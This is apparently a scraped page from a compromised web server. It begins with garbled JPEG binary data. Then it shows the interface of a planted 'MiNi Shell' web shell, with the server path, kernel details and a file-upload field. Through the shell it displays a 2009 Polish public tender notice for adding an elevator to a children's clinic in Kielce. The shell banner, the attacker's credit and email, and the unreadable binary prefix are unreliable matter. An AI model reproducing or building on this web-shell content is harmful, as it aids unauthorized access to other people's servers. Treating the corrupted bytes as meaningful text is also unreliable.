JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090911/315758-N-2009.html

<p class="kh_header"><b>Kielce: Rozbudowa budynku przychodni dziecięcej NZOZ przy ul. Mickiewicza 4 w Kielcach o windę zewnętrzną.</b><br>
<b>Numer ogłoszenia: 315758 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków w Kielcach , ul. Paderewskiego 20, 25-004 Kielce, woj. świętokrzyskie, tel. 041 3442139 w. 37, faks 041 3446647.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzb.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku przychodni dziecięcej NZOZ przy ul. Mickiewicza 4 w Kielcach o windę zewnętrzną..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż urządzenia do pionowego
transportu osób niepełnosprawnych wraz z odbiorem i rejestracją w UDT oraz
niezbędnymi robotami towarzyszącymi. Projektowana winda posiada wymiary
zewnętrzne 1,555 x 1,630 m i mieć będzie trzy przystanki od wewnątrz 
budynku i jeden na zewnątrz budynku od strony dziedzińca. Wykonanie przedmiotu 
zamówienia wymaga rozbudowy istniejącego budynku przychodni, która polegać będzie na wykonaniu robót budowlano - instalacyjnych t.j.:
	Teren działki
  - przesunąć istniejącą studzienkę kanalizacji sanitarnej, 
  - wykonać koryta odprowadzające wodę z rynien i rur spustowych,
  - w pobliżu projektowanego urządzenia i studzienki kanalizacyjnej wymienić  
    istniejącą nawierzchnię na kostkę brukową;
	Budynek istniejący 
 - demontaż istniejących okien na parterze, I-ym i II-gim piętrze,
 - wyburzenie ścian podparapetowych pod w-w oknami,
 - wyburzenie istniejących płyt balkonowych w poziomie I i II-go piętra wraz z 
    balustradami stalowymi,
 - wykonanie i zabezpieczenie wykopu pod fundament windy,
 - wykonanie żelbetowej płyty fundamentowej pod windę, 
 - wymurowanie ścian podziemia z bloczków betonowych B20, 
 - wykonanie nadproży drzwiowych z profili stalowych walcowanych,
 - zamurowanie fragmentów ścian zewnętrznych wraz z otynkowaniem, 
 - wykonanie posadzki na parterze przy windzie z płytek gresowych;  
	Parter budynku
 - wyburzenie istniejącej ścianki działowej w pokoju badań,
 - wymiana 1-go istniejącego okna drewnianego na nowe okno z PCV,
 - demontaż istniejących drzwi,
 - demontaż 2-ch istniejących grzejników żeliwnych i gniazd elektrycznych,
 - montaż 2-ch nowych grzejników aluminiowych wraz z podłączeniem do 
   istniejącej inst. c.o., 
 - wykonanie otworu drzwiowego,
 - wyrównanie różnicy poziomów wynoszącej 7 cm;
	I-e i II-gie piętro
 - wykonanie otworów w ścianie zewnętrznej,
 - wykonanie balustrad balkonowych zabezpieczających drzwi balkonowe,
 - wymiana 2 kpl. istniejących drzwi balkonowych drewnianych na nowe drzwi 
    balkonowe z PCV, 
 - ułożenie płytek gresowych na podłodze w komunikacji,
 - rozkucie i zamurowanie ściany zewnętrznej wraz z otynkowaniem i 
   pomalowaniem,
 - demontaż 2-ch istniejących grzejników żeliwnych wraz z demontażem pionów 
     c.o.,
 - montaż 2-ch nowych grzejników aluminiowych wraz z podłączeniem do nowo
   projektowanego pionu c.o.;
	Roboty elektryczne
 - doprowadzenie kabla elektrycznego do miejsca montażu skrzynki sterowniczej
   mającego zasilać dźwig - linia zasilająca typu YDY 5x 4 mm2 - w listwie
    instalacyjnej 30x30,
 - rozbudowa istniejącej tablicy bezpiecznikowej o wyłącznik nadprądowy w 
   obudowie,
 - montaż skrzynki sterowniczej windy.
Wykonawca zobowiązany jest do wywiezieniu gruzu i innych materiałów pochodzących z terenu rozbudowy budynku na miejsce utylizacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 42.41.61.00-6, 45.21.51.20-4, 45.11.12.00-0, 45.23.13.00-8, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 3 000,00 PLN 
słownie: trzy tysiące 00/100 złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy: 
1) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004r. - Pzp;
2) spełniają warunki określone w art. 22 ust. 1 ustawy - Pzp;
3) w celu potwierdzenia warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia  2004 r. - Pzp, Wykonawca powinien spełniać następujące wymagania: 

3.1. Posiadać uprawnienia do wykonywania określonej działalności lub czynności  
      będącej przedmiotem zamówienia. 
3.2. Posiadać niezbędną wiedzę i doświadczenie do wykonania zamówienia, tj.:
      wykazać wykonanie w ciągu ostatnich trzech lat przed dniem wszczęcia 
      postępowania o udzieleniu zamówienia, a jeżeli okres prowadzenia działalności 
      jest krótszy - w tym okresie, zamówień odpowiadających swoim rodzajem (
      tz.: polegających na dostawie wraz z montażem i uruchomieniem windy
      osobowej dla osób niepełnosprawnych wraz z robotami towarzyszącymi ) o 
      wartości co najmniej 150 000,00 PLN brutto każde.
3.3. Dysponować osobami które będą uczestniczyć w wykonania zamówienia lub 
      przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób
      zdolnych do wykonania zamówienia, jeżeli Wykonawca wskazał osoby, którymi 
      będzie dysponował, tj.: dysponować co najmniej 3 osobami kadry technicznej 
      o kwalifikacjach i doświadczeniu niezbędnych do wykonania zamówienia, 
      posiadającymi uprawnienia budowlane do kierowania robotami w   
      specjalnościach:
      a)	konstrukcyjno-budowlanej - co najmniej 1 osoba;  
      b)	instalacyjnej w zakresie: instalacji cieplnych i sieci kanalizacji  
             sanitarnych - co najmniej 1 osoba;
      c)	instalacyjnej w zakresie: instalacji elektrycznych i urządzeń 
             elektroenergetycznych - co najmniej 1 osoba; 
z załączeniem kopii uprawnień budowlanych oraz zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego, wydanego przez tę izbę (ważne na dzień otwarcia ofert).
3.4 Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
     zamówienia, tj.:przedstawić polisę lub inny dokument potwierdzający, że 
     Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
     prowadzonej działalności do wartości nie mniejszej niż 150 000,00 PLN (słownie 
     złotych: sto pięćdziesiąt tysięcy 00/100).
Zamawiający oceni spełnienie przez Wykonawców warunków udziału w postępowaniu na podstawie analizy dokumentów i oświadczeń przedłożonych w ofertach, wg kryteriów: spełnia lub nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy ubiegajacy się o udzielenie zamówienia składają wraz z ofertą - załącznik do SIWZ - Druk nr 1:
1. Oświadczenie Wykonawcy potwierdzające spełnianie warunków określonych w art. 22 ust. 1, a pośrednio art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych - załącznik do SIWZ - Druk nr 3.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku spółek cywilnych należy załączyć wpis do ewidencji działalności każdego z udziałowców oraz umowę regulującą współpracę podmiotów występujących wspólnie.
3.  Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t.j. Dz.U. z 2007r. Nr 223, poz. 1655 ze zm.) - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku podmiotów zbiorowych - aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Wykazać wykonanie w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzieleniu zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1-go zamówienia odpowiadającego swoim rodzajem ( tj.: polegającego na dostawie wraz z montażem i uruchomieniem windy osobowej dla osób niepełnosprawnych oraz robotami towarzyszącymi ) o wartości co najmniej 150 000,00 PLN brutto każde zamówienie - załącznik do SIWZ - Druk nr 6a.
6. Wykazać osoby, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia o kwalifikacjach i doświadczeniu niezbędnych do wykonania zamówienia, posiadającymi stosowne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie.
Należy wykazać co najmniej 3 osoby kadry technicznej przewidziane przy realizacji zamówienia, posiadające uprawnienia budowlane do kierowania robotami w specjalnościach:
a)	konstrukcyjno-budowlanej - co najmniej 1 osoba;  
b)	instalacyjnej w zakresie: instalacji cieplnych i sieci kanalizacji 
             sanitarnych - co najmniej 1 osoba;
c)	instalacyjnej w zakresie: instalacji elektrycznych i urządzeń 
             elektroenergetycznych - co najmniej 1 osoba; 
z załączeniem kopii uprawnień budowlanych oraz zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego, wydanego przez tę izbę (ważne na dzień otwarcia ofert) - załącznik do SIWZ - Druk nr 6b.
7. Przedstawić polisę lub inny dokument potwierdzający, że Wykonawca jest
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności do
wartości nie mniejszej niż 150 000,00 PLN (słownie złotych: sto pięćdziesiąt tysięcy 00/100).
8. Oświadczenie Wykonawcy o przedłużeniu ubezpieczenia od odpowiedzialności cywilnej ( jezeli dotyczy) - załącznik do SIWZ - Druk nr 13.
9. Dowód wniesienia wadium.
10. Oświadczenie o dokonaniu wizji lokalnej - załącznik do SIWZ - Druk nr 7. 
11. Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik.
12. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
13. Oświadczenie Wykonawcy z art. 36 ust. 4 Pzp wg załączonego wzoru - załącznik do SIWZ - Druk nr 4.
UWAGA! 	   
14. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2; 3; 4; składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a/ nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b/ nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne  i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu,
c/ nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
14.1. W zakresie pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 Pzp.
Dokumenty o których mowa w pkt 14 ppkt a i c oraz pkt.14.1., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, dokumenty o których mowa w pkt 14 ppkt b., powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
14.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 14. zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzb.kielce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół ds. Zamówień Publicznych - Miejski Zarząd Budynków, 25-004 Kielce, ul. Paderewskiego 20, lok. 104..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 10:00, miejsce: Sekretariat ( lok. 202) - Miejskiego Zarządu Budynków w Kielcach, 25-004 Kielce, ul. Paderewskiego 20..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com